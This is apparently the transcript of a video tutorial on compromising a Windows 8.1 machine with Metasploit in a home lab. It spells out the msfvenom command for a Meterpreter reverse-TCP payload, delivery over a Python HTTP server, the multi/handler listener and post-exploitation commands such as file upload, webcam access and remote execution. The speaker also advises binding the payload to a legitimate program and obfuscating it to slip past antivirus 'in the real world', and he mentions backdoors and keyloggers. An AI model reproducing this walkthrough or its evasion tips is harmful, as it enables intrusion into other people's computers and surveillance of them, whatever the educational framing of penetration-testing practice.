All right. In this video, I'm going to show you how to use Metasploit Framework to attack Windows 8.1 systems. So this instance, we are using Kali Linux. So this is a virtual machine. And this is the Windows 8.1 machine that we're going to use as a compromise machine. So this one is fully patched. So I can show it to you by going to command prompt and typing system info. Let's check that. So you can see all the updates, security updates of this system. So it's running on my VMware. All right. Now we're going to test the payload here using Metasploit, a very common framework for pen testers. Okay. So this is for educational purposes. You can see here, I made this simple README for the viewers. So let's talk about the pros of using Metasploit. All right, so it bypasses firewall's restriction because of the reverse TCP approach. So basically, reverse TCP is when the attacker generated a payload, and then that payload transferred over to the compromised machine, and when that particular machine execute that payload, then it will initiate a connection back to the attacker's machine. All right, so that's how it works, and it bypasses the firewall because of the outbound connection. It's an outbound connection. Um, but if it's the other way around, like if the attacker machine trying to connect to the compromised machine, then the firewall will be at the middle and will cut it right then and there. So the connection will not be made. All right. I hope that I explained that in a simple way. And this is the local area network IP address we're going to use for this Kali box. And this is the port we're going to use. This is a very common port for Metasploit. Um, all right. Also, this is very interactive interpreter shell for script kiddies. So, script kiddies, those who just upload stuff online or download stuff online and then try to run them just for the sake of curiosity or whatnot. All right. It has a built in persistence as well. So, persistence is a backdoor, basically. So, it allows you to connect back to the compromised machine anytime you want. When you install the payload, you can generate usually when you install the payload to the compromised machine, then you generate the backdoor as well. So anytime that the connection has been closed, then you can connect back anytime that the compromised machine is up and running. So it's going to be possible for you to connect back to that computer or laptop or devices, whatever you call it. And it has a post exploit toolkit. So post exploitation toolkits is something like keyloggers that you can install right after you made the connection possible. What else? You can download files, create a SSH connection, or just check all the open ports on their system. Well, you can use that. You can use Nmap for that, but it's best to just run it within that environment. But anyways, let's talk about the cons of Metasploit framework. So this is a very common tools for pen testers and not an antivirus proof. So when you try to run this on a live environment, it's going to automatically block that connection because it's a very common tools that pen tester uses, and a lot of antivirus companies already have signatures for the programs they have. And also, what I don't like about it is the encoders or the obfuscation methods are very outdated. Okay, but I think this easy to generate payload listener should go to this pros, because for it's very easy to generate your own payload using this one, using Metasploit. I mean, all right. So let's start. And before we start, I'm just gonna let you know again that this is a local area network attack, and I'm using my own devices for this. So it's purely educational purposes. All right. First, before we can even start, we have to make sure to check the IP address, verify the IP address is correct. Um, I know I already put it here, but I just want to verify I have the right IP address. So I have this local area IP address for this Kali machine. It's correct, right? Now I'm going to run to generate a payload using MSFvenom. So it's a program built inside the Metasploit framework. Okay, so sudo MSFvenom -a for architecture. So the architecture is x64 since the machine that Windows 8.1 uses is based on a system type of x64. And dash payload Windows, then type the architecture again, interpreter, then / reverse TCP. Then lhost, or for the local host of the attacker's IP. So that's the one that we just verify. 172.24.207.111. Local port is 444. And this file is executable. We're not going to use encoders this time, since this is just a simple demo on how to generate a payload using Linux. And we are going to output that file to, let's say, chess.executable. So let's try to generate this one, just making sure that the syntax is correct. So I don't have to re-enter this code or enter this command line. All right. Type my password there because I run it in sudo. And let's wait. Oh, there you go. Generated the payload. Type ls. So that's chess.exe right there. Now, the problem we have here is since that this payload is located in my attacker's machine, the question here is how can we transfer this payload to this machine right here? So it's very simple. We just have to create a HTTP server. So if you have Python 3 installed, which if you're running Kali Linux, then most likely you have it pre-installed already. We have to run this command sudo python 3 -module http.server, and then we have to type in a port for that. I'm going to use 4545. All right. Okay, so back to this compromised machine, or should I say Windows 8.1 fully patched machine. All right, we are going to use Edge browser for that. Again, as what I told you on this README, that this particular payload is not AV proof. That's the cons for this. If I try to run this using Windows Defender scanning real time, then it's not going to run. So what I have to do is go to Defender or Windows Defender. This is a built-in antivirus for Windows. So just have this is turned off right now. So just want to try to run it like this because this is just a simple demo. Again, right? Run that again. I have to type in HTTP. Go to the website of the attacker, which is his IP address in this instance, 207.111, port 4545 for our Python server here, / the name of the file. or the payload that we generated. Okay, all right, downloads it. Now, um, we have to run the listener for Metasploit. And I'm going to do that here now. Okay. We're going to run it in sudo. MSF console is the listener for Metasploit console. Type in. All right. We're going to use a multi-handler. I mispronounced that. Multi-handler approach on this. All right. So use exploit multi-handler. I'm going to set the payload to the one that we created, which is Windows x64 Meterpreter is the shell, and then reverse TCP is for the connection. Now check all the required parameters for this to run. Oh, so it looks like we need to type in the host and port. So here the port is already provided, so we don't have to type in any modifications or we don't have to edit that L port. Okay. Set L host to one. I'm just gonna copy this one. I feel lazy today. Okay, and then paste it here, and then run the exploit. So what this does is it runs the listener. It's waiting for an incoming connection from the compromised machine. And now, if we go back to this compromised machine, and if I close this, I can see that this is up and running now. So I just have to click, just have to double click this one. So let's try to run this. Oop, I think I already downloaded it. It should be in the full downloads tab. Have a look. Oh, it's not yet downloaded. Oh, my fault. All right, let's go back there again. And 4545 just dot executable. Keep. Let's try to keep that file. Keep anyway. All right, so the file is here. So what we can do is we can run this as it is. So as a normal user in the real world, you have to bind this together with a legitimate executable. And before binding it, I would suggest to obfuscate the code and not use Metasploit. Yeah, number one thing that you have to do is not use it on a live environment. Okay, now let's run this. Now here, I'm listening using my Kali Linux virtual machine. All right, so when I double click this, it's going to create a connection. So watch this CLI here. Run anyway. See, so it made a connection. Okay, it's very nice, right? This simple thing. All right, sysinfo to check. Oh, it's not click yet. Sysinfo to check that we have the system. We to just verify the system information of this compromised Windows 8.1. All right, type that in. You can see here that that's Windows 8.1 and the current build of the victim's machine. And now if I type in help, you see again the one of the pros using this is it's very interactive for script kiddies. All you have to do is to just type type in the syntax help, and then it will show you all the things that you can do using the interpreter. And all right, so first thing we can do here, we can try to upload a file. right? So, for example, you want to do post exploitation, then you want to upload the file. Simply, you just have to type in the syntax upload. All right. And I'm just going to type upload real quick, see if it's going to give us an option. There you go. Upload recursively. And you can see the usage here. Source 1, source 2, source 3, right? So from here, first we have to check in which directory we're in right now. So we're in user Professor downloads. All right. So I'm going to upload Mount C. So if I go back here, I'll just have a look on which file to upload. So print working directory, and I'm going to make a file real quick. This file is just a sample. Upload. All right, and then we're going to pass that to upload.txt. I forgot about that simple thing all the time. All right, just to add that closing parameter, which is this one, and pass it there. There you go. Now we have upload.txt. Let's read that file, see if that is the file that I created. All right. Now we're going to upload that. Okay. So from here, I'm going to upload that upload.txt to the Windows system. Right. So the Windows system is this right here. I'm going to upload it on the desktop instead. Then we'll see example, right? That's it. Then I have to close this, and then you can see on the compromised machine from the attacker's machine, we're going to upload a file, which is a text file in this case. All right, so if I type in this command, it's going to initiate that. There you go, upload it. It says here it was uploaded to C user Professor desktop. It did not happen, I think, because I need to use a double backward slash. Oh, I remember now. Because they don't allow, for some reason, it's very odd. You have to use double backward slash if you're using Windows system. So let me try to use that. Backslash, backward slash. What am I saying? All right. There you go. Initiated, right? Now, let's see if this is the file. Okay, this file is just a sample upload. So there's a lot of things that you can do. And by typing help, you'll see a lot of things. And if this compromised system has a webcam, then you can stream the webcam easily. You can take a snapshot of using that webcam. Check all the webcam if there's any available. In this instance, if I type that command webcam dot underscore list, then it's not going to show me any webcams because I'm not using a webcam on this virtual machine. Right, and then let's try to see if we can have this browser, like use this browser to like open a file or something. All right, let's just try that. See if it will work. Okay. Okay, then just going to copy this. Execute dash file. Then it's going to execute this file that's on this directory, which is the Internet Explorer. And let's see if we can pull up Internet Explorer on the compromised machine using this command. All right, there you go. Simple, right? All right, so we've done it already. So thank you guys for watching this video. This is just a simple demo on how we can bypass that. But if we're going to run this file here, also I'm going to show you this. If I'm going to run this file with the antivirus on, it's going to block it because again, this is a Metasploit framework and it's a well-known um, payload generator. So turn that on. Automatically, it's going to detect that for sure, that malicious file, because this is fully patched system. So if I go to desktop, there you go. It just detect that instantly, right? So in the real world, you're gonna use some obfuscation methods like encoders, and you have to like encode it multiple times using different techniques. I have a video on that where you can generate a zero-day attack on the fully patched Windows 8.1. I'm also going to make a video on how to do that on fully patched Windows 10 system and Windows 11. I know it's easier said than done, but I have zero-day payloads. All right, let's stop this video right here. Thank you for watching this, and I'll see you in my next video.